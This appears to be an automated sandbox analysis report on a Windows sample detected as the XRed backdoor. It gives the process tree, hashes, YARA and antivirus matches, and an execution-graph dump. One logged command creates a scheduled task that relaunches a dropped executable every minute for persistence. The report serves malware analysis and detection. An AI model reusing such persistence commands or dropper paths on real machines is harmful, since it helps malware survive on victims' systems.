                                                                                                                                                      2024-12-30 10:26:10 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 4d 48 53 46 66 59 5f 46 58 5a 79 55 5a 64 78 6e 4a 7a 73 7a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="TMHSFfY_FXZyUZdxnJzszw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:26:10 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Target ID:0
                                                                                                                                                      Start time:05:25:18
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Users\user\Desktop\JPS.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\JPS.exe"
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:1'989'120 bytes
                                                                                                                                                      MD5 hash:290A46D2614F4CE4F7AD75D2CEA2CE23
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:2
                                                                                                                                                      Start time:05:25:19
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Users\user\Desktop\._cache_JPS.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\._cache_JPS.exe"
                                                                                                                                                      Imagebase:0xa90000
                                                                                                                                                      File size:1'217'536 bytes
                                                                                                                                                      MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000002.00000002.2564672501.00000000040E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 68%, ReversingLabs
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:false

                                                                                                                                                      General

                                                                                                                                                      Target ID:3
                                                                                                                                                      Start time:05:25:19
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:771'584 bytes
                                                                                                                                                      MD5 hash:B50AAC59E97F3D38A19ACB9253FABEBC
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.1387520897.0000000000535000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 92%, ReversingLabs
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:4
                                                                                                                                                      Start time:05:25:20
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                      Imagebase:0x6d0000
                                                                                                                                                      File size:53'161'064 bytes
                                                                                                                                                      MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:false

                                                                                                                                                      General

                                                                                                                                                      Target ID:5
                                                                                                                                                      Start time:05:25:21
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                                                                                                                                                      Imagebase:0xc30000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:6
                                                                                                                                                      Start time:05:25:21
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff68cce0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:7
                                                                                                                                                      Start time:05:25:21
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs
                                                                                                                                                      Imagebase:0xe60000
                                                                                                                                                      File size:147'456 bytes
                                                                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2555561177.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2554418377.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:false

                                                                                                                                                      General

                                                                                                                                                      Target ID:8
                                                                                                                                                      Start time:05:25:22
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                                                                                                                                                      Imagebase:0x490000
                                                                                                                                                      File size:187'904 bytes
                                                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:10
                                                                                                                                                      Start time:05:25:24
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Imagebase:0x730000
                                                                                                                                                      File size:1'217'536 bytes
                                                                                                                                                      MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 68%, ReversingLabs
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:13
                                                                                                                                                      Start time:05:25:32
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                                                                                                                                      Imagebase:0x730000
                                                                                                                                                      File size:1'217'536 bytes
                                                                                                                                                      MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:15
                                                                                                                                                      Start time:05:25:40
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:771'584 bytes
                                                                                                                                                      MD5 hash:B50AAC59E97F3D38A19ACB9253FABEBC
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:16
                                                                                                                                                      Start time:05:25:49
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                                                                                                                                      Imagebase:0x730000
                                                                                                                                                      File size:1'217'536 bytes
                                                                                                                                                      MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:19
                                                                                                                                                      Start time:05:25:57
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7604 -s 3432
                                                                                                                                                      Imagebase:0xe0000
                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:20
                                                                                                                                                      Start time:05:25:57
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                                                                                                                                      Imagebase:0x730000
                                                                                                                                                      File size:1'217'536 bytes
                                                                                                                                                      MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:21
                                                                                                                                                      Start time:05:26:01
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Imagebase:0x730000
                                                                                                                                                      File size:1'217'536 bytes
                                                                                                                                                      MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:24
                                                                                                                                                      Start time:05:27:00
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Imagebase:0x730000
                                                                                                                                                      File size:1'217'536 bytes
                                                                                                                                                      MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      Disassembly

                                                                                                                                                      Reset < >

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:4.3%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                        Signature Coverage:10.1%
                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                        Total number of Limit Nodes:35
                                                                                                                                                        execution_graph 103652 a9e849 103655 aa26c0 103652->103655 103654 a9e852 103656 aa273b 103655->103656 103657 b0862d 103655->103657 103662 aa2adc 103656->103662 103663 aa277c 103656->103663 103672 aa279a 103656->103672 103857 add520 86 API calls 4 library calls 103657->103857 103659 b0863e 103858 add520 86 API calls 4 library calls 103659->103858 103660 aa27cf 103660->103659 103665 aa27db 103660->103665 103661 aa2a84 103846 a9d380 103661->103846 103856 a9d349 53 API calls 103662->103856 103697 aa28f6 103663->103697 103777 a9d500 53 API calls __cinit 103663->103777 103666 aa27ef 103665->103666 103681 b0865a 103665->103681 103669 aa2806 103666->103669 103670 b086c9 103666->103670 103778 a9fa40 103669->103778 103675 b08ac9 103670->103675 103678 a9fa40 413 API calls 103670->103678 103672->103660 103672->103661 103686 aa2914 103672->103686 103937 add520 86 API calls 4 library calls 103675->103937 103679 b086ee 103678->103679 103692 b0870a 103679->103692 103694 aa29ec 103679->103694 103861 a9d89e 103679->103861 103681->103670 103681->103694 103859 aef211 413 API calls 103681->103859 103860 aef4df 413 API calls 103681->103860 103682 b08980 103932 add520 86 API calls 4 library calls 103682->103932 103758 a9cdb4 103686->103758 103687 aa2836 103687->103675 103689 a9fa40 413 API calls 103687->103689 103711 aa287c 103689->103711 103691 aa28cc 103691->103697 103834 a9cf97 58 API calls 103691->103834 103700 b0878d 103692->103700 103871 a9346e 48 API calls 103692->103871 103694->103654 103695 aa296e 103695->103694 103701 aa2984 103695->103701 103706 b08a97 103695->103706 103714 b089b4 103695->103714 103696 aa28ac 103696->103691 103930 a9cf97 58 API calls 103696->103930 103705 aa2900 103697->103705 103931 a9cf97 58 API calls 103697->103931 103699 b0883f 103924 aec235 413 API calls Mailbox 103699->103924 103700->103699 103704 b0882d 103700->103704 103888 ad4e71 53 API calls __cinit 103700->103888 103701->103706 103835 aa41fc 84 API calls 103701->103835 103910 a9ca8e 103704->103910 103705->103682 103705->103686 103706->103694 103936 a94b02 50 API calls 103706->103936 103708 b08888 103715 aa281d 103708->103715 103716 b0888c 103708->103716 103711->103694 103711->103696 103719 a9fa40 413 API calls 103711->103719 103763 aebf80 103714->103763 103715->103687 103715->103694 103926 a9c935 103715->103926 103925 add520 86 API calls 4 library calls 103716->103925 103718 aa29b8 103720 b08a7e 103718->103720 103836 aa41fc 84 API calls 103718->103836 103726 b088ff 103719->103726 103935 aaee93 84 API calls 103720->103935 103721 b08725 103721->103704 103872 aa14a0 103721->103872 103723 b08813 103731 a9d89e 50 API calls 103723->103731 103724 b087ca 103724->103723 103889 a984a6 103724->103889 103726->103694 103732 a9d89e 50 API calls 103726->103732 103728 b089f3 103739 b08a01 103728->103739 103740 b08a42 103728->103740 103730 aa29ca 103730->103694 103735 b08a6f 103730->103735 103736 aa29e5 103730->103736 103733 b08821 103731->103733 103732->103696 103737 a9d89e 50 API calls 103733->103737 103934 aed1da 50 API calls 103735->103934 103837 ab010a 103736->103837 103737->103704 103738 b0875d 103738->103704 103747 aa14a0 48 API calls 103738->103747 103744 a9ca8e 48 API calls 103739->103744 103741 a9d89e 50 API calls 103740->103741 103745 b08a4b 103741->103745 103744->103694 103748 a9d89e 50 API calls 103745->103748 103746 b087e0 103746->103723 103909 ada76d 49 API calls 103746->103909 103750 b08775 103747->103750 103751 b08a57 103748->103751 103753 a9d89e 50 API calls 103750->103753 103933 a94b02 50 API calls 103751->103933 103752 b08807 103755 a9d89e 50 API calls 103752->103755 103756 b08781 103753->103756 103755->103723 103757 a9d89e 50 API calls 103756->103757 103757->103700 103759 a9cdc5 103758->103759 103760 a9cdca 103758->103760 103759->103760 103938 ab2241 48 API calls 103759->103938 103760->103695 103762 a9ce07 103762->103695 103766 aebfd9 _memset 103763->103766 103764 aec033 103941 aec235 413 API calls Mailbox 103764->103941 103766->103764 103768 aec14c 103766->103768 103771 aec097 VariantInit 103766->103771 103767 aec22e 103767->103728 103768->103764 103769 aec19f VariantInit VariantClear 103768->103769 103770 aec1c5 103769->103770 103770->103764 103772 aec1e6 103770->103772 103775 aec0d6 103771->103775 103940 ada6f6 103 API calls 103772->103940 103774 aec20d VariantClear 103774->103767 103775->103764 103939 ada6f6 103 API calls 103775->103939 103777->103672 103779 a9fa60 103778->103779 103815 a9fa8e Mailbox _memmove 103778->103815 103780 ab010a 48 API calls 103779->103780 103780->103815 103781 aa105e 103783 a9c935 48 API calls 103781->103783 103782 aa1063 104378 add520 86 API calls 4 library calls 103782->104378 103808 a9fbf1 Mailbox 103783->103808 103784 aca599 InterlockedDecrement 103784->103815 103785 a9d3d2 48 API calls 103785->103815 103786 aa0119 104379 add520 86 API calls 4 library calls 103786->104379 103789 aa0dee 103795 a9d89e 50 API calls 103789->103795 103790 a9c935 48 API calls 103790->103815 103792 ab1b2a 52 API calls __cinit 103792->103815 103793 ab010a 48 API calls 103793->103815 103794 aa0dfa 103797 a9d89e 50 API calls 103794->103797 103795->103794 103796 b0b772 104380 add520 86 API calls 4 library calls 103796->104380 103800 aa0e83 103797->103800 104367 a9caee 103800->104367 103802 b0b7d2 103807 aa1230 103807->103808 104377 add520 86 API calls 4 library calls 103807->104377 103808->103715 103809 a9fa40 413 API calls 103809->103815 103812 b0b583 104375 add520 86 API calls 4 library calls 103812->104375 103814 aa10f1 Mailbox 104376 add520 86 API calls 4 library calls 103814->104376 103815->103781 103815->103782 103815->103784 103815->103785 103815->103786 103815->103789 103815->103790 103815->103792 103815->103793 103815->103794 103815->103796 103815->103800 103815->103807 103815->103808 103815->103809 103815->103812 103815->103814 103942 a9f6d0 103815->103942 104014 af798d 103815->104014 104019 af30ad 103815->104019 104073 ae9122 103815->104073 104087 a981c6 103815->104087 104157 aaef0d 103815->104157 104200 ae92c0 103815->104200 104218 aadd84 103815->104218 104221 aaf03e 103815->104221 104224 af17aa 103815->104224 104229 ae013f 103815->104229 104242 af1f19 103815->104242 104245 af10e5 103815->104245 104251 af0bfa 103815->104251 104254 a950a3 103815->104254 104259 ae8065 GetCursorPos GetForegroundWindow 103815->104259 104273 af804e 103815->104273 104287 aaf461 103815->104287 104325 aeb74b VariantInit 103815->104325 104366 aa1620 59 API calls Mailbox 103815->104366 104371 aeee52 82 API calls 2 library calls 103815->104371 104372 aeef9d 90 API calls Mailbox 103815->104372 104373 adb020 48 API calls 103815->104373 104374 aee713 413 API calls Mailbox 103815->104374 103834->103697 103835->103718 103836->103730 103840 ab0112 __calloc_impl 103837->103840 103839 ab012c 103839->103694 103840->103839 103841 ab012e std::exception::exception 103840->103841 105847 ab45ec 103840->105847 105861 ab7495 RaiseException 103841->105861 103843 ab0158 105862 ab73cb 47 API calls _free 103843->105862 103845 ab016a 103845->103694 103847 a9d38b 103846->103847 103848 a9d3b4 103847->103848 105869 a9d772 55 API calls 103847->105869 103850 a9d2d2 103848->103850 103853 a9d2df 103850->103853 103854 a9d30a 103850->103854 103851 a9d2e6 103851->103854 105870 a9d349 53 API calls 103851->105870 103853->103851 105871 a9d349 53 API calls 103853->105871 103854->103686 103856->103696 103857->103659 103858->103681 103859->103681 103860->103681 103862 a9d8ac 103861->103862 103869 a9d8db Mailbox 103861->103869 103863 a9d8ff 103862->103863 103865 a9d8b2 Mailbox 103862->103865 103864 a9c935 48 API calls 103863->103864 103864->103869 103866 a9d8c7 103865->103866 103867 b04e9b 103865->103867 103868 b04e72 VariantClear 103866->103868 103866->103869 103867->103869 105872 aca599 InterlockedDecrement 103867->105872 103868->103869 103869->103692 103871->103721 103873 aa1606 103872->103873 103875 aa14b2 103872->103875 103873->103738 103874 aa14be 103880 aa14c9 103874->103880 105874 a9346e 48 API calls 103874->105874 103875->103874 103877 ab010a 48 API calls 103875->103877 103878 b05299 103877->103878 103879 ab010a 48 API calls 103878->103879 103887 b052a4 103879->103887 103881 aa156d 103880->103881 103882 ab010a 48 API calls 103880->103882 103881->103738 103883 aa15af 103882->103883 103884 aa15c2 103883->103884 105873 aad6b4 48 API calls 103883->105873 103884->103738 103886 ab010a 48 API calls 103886->103887 103887->103874 103887->103886 103888->103724 103890 a984be 103889->103890 103904 a984ba 103889->103904 103891 b05592 __i64tow 103890->103891 103892 b05494 103890->103892 103893 a984d2 103890->103893 103901 a984ea __itow Mailbox _wcscpy 103890->103901 103894 b0557a 103892->103894 103895 b0549d 103892->103895 105875 ab234b 80 API calls 4 library calls 103893->105875 105876 ab234b 80 API calls 4 library calls 103894->105876 103900 b054bc 103895->103900 103895->103901 103897 ab010a 48 API calls 103899 a984f4 103897->103899 103902 a9caee 48 API calls 103899->103902 103899->103904 103903 ab010a 48 API calls 103900->103903 103901->103897 103902->103904 103905 b054d9 103903->103905 103904->103746 103906 ab010a 48 API calls 103905->103906 103907 b054ff 103906->103907 103907->103904 103908 a9caee 48 API calls 103907->103908 103908->103904 103909->103752 103911 a9ca9a 103910->103911 103912 a9cad0 103910->103912 103917 ab010a 48 API calls 103911->103917 103913 a9cad9 103912->103913 103914 a9cae3 103912->103914 103915 a97e53 48 API calls 103913->103915 103916 a9c4cd 48 API calls 103914->103916 103921 a9cac6 103915->103921 103916->103921 103918 a9caad 103917->103918 103919 b04f11 103918->103919 103920 a9cab8 103918->103920 103919->103921 103923 a9d3d2 48 API calls 103919->103923 103920->103921 103922 a9caee 48 API calls 103920->103922 103921->103699 103922->103921 103923->103921 103924->103708 103925->103694 103927 a9c948 103926->103927 103928 a9c940 103926->103928 103927->103687 103929 a9d805 48 API calls 103928->103929 103929->103927 103930->103691 103931->103705 103932->103694 103933->103694 103934->103720 103935->103706 103936->103675 103937->103694 103938->103762 103939->103768 103940->103774 103941->103767 103943 a9f708 103942->103943 103948 a9f77b 103942->103948 103944 b0c4d5 103943->103944 103945 a9f712 103943->103945 103950 b0c4e2 103944->103950 103951 b0c4f4 103944->103951 103946 a9f71c 103945->103946 103966 b0c544 103945->103966 103956 b0c6a4 103946->103956 103965 a9f72a 103946->103965 104009 a9f741 103946->104009 103947 a9fa40 413 API calls 103986 a9f787 103947->103986 103949 b0c253 103948->103949 103948->103986 104404 add520 86 API calls 4 library calls 103949->104404 104381 aef34f 103950->104381 104412 aec235 413 API calls Mailbox 103951->104412 103952 b0c585 103962 b0c590 103952->103962 103963 b0c5a4 103952->103963 103959 a9c935 48 API calls 103956->103959 103957 b0c264 103957->103815 103958 b0c507 103961 b0c50b 103958->103961 103958->104009 103959->104009 104413 add520 86 API calls 4 library calls 103961->104413 103967 aef34f 413 API calls 103962->103967 104415 aed154 48 API calls 103963->104415 103965->104009 104513 aca599 InterlockedDecrement 103965->104513 103966->103952 103978 b0c569 103966->103978 103967->104009 103969 b0c45a 103972 a9c935 48 API calls 103969->103972 103970 b0c7b5 103977 b0c7eb 103970->103977 104515 aeef9d 90 API calls Mailbox 103970->104515 103971 b0c5af 103985 b0c62c 103971->103985 103996 b0c5d1 103971->103996 103972->104009 103976 a9f84a 103980 b0c32a 103976->103980 103993 a9f854 103976->103993 103982 a9d89e 50 API calls 103977->103982 104414 add520 86 API calls 4 library calls 103978->104414 103979 b0c793 103984 a984a6 81 API calls 103979->103984 104405 a9342c 103980->104405 104011 a9f770 Mailbox 103982->104011 103999 b0c79b __wsetenvp 103984->103999 104440 adafce 48 API calls 103985->104440 103986->103947 103986->103976 103989 a9f8bb 103986->103989 103991 ab2241 48 API calls 103986->103991 103997 a9f9d8 103986->103997 103986->104011 103987 b0c7c9 103992 a984a6 81 API calls 103987->103992 103989->103957 103989->103969 103989->104009 104409 aca599 InterlockedDecrement 103989->104409 104411 aef4df 413 API calls 103989->104411 103990 aa14a0 48 API calls 103995 a9f8ab 103990->103995 103991->103986 104003 b0c7d1 __wsetenvp 103992->104003 103993->103990 103995->103989 103995->103997 104416 ada485 48 API calls 103996->104416 104410 add520 86 API calls 4 library calls 103997->104410 103999->103970 104001 a9d89e 50 API calls 103999->104001 104000 b0c63e 104441 aadf08 48 API calls 104000->104441 104001->103970 104003->103977 104006 a9d89e 50 API calls 104003->104006 104005 b0c5f6 104417 aa44e0 104005->104417 104006->103977 104007 b0c647 Mailbox 104442 ada485 48 API calls 104007->104442 104009->103970 104009->104011 104514 aeee52 82 API calls 2 library calls 104009->104514 104011->103815 104012 b0c663 104443 aa3680 104012->104443 105370 a919ee 104014->105370 104018 af79a4 104018->103815 104020 a9ca8e 48 API calls 104019->104020 104021 af30ca 104020->104021 104022 a9d3d2 48 API calls 104021->104022 104023 af30d3 104022->104023 104024 a9d3d2 48 API calls 104023->104024 104025 af30dc 104024->104025 104026 a9d3d2 48 API calls 104025->104026 104027 af30e5 104026->104027 104028 a984a6 81 API calls 104027->104028 104029 af30f4 104028->104029 104030 af3d7b 48 API calls 104029->104030 104031 af3128 104030->104031 104032 af3af7 49 API calls 104031->104032 104033 af3159 104032->104033 104034 af319c RegOpenKeyExW 104033->104034 104035 af3172 RegConnectRegistryW 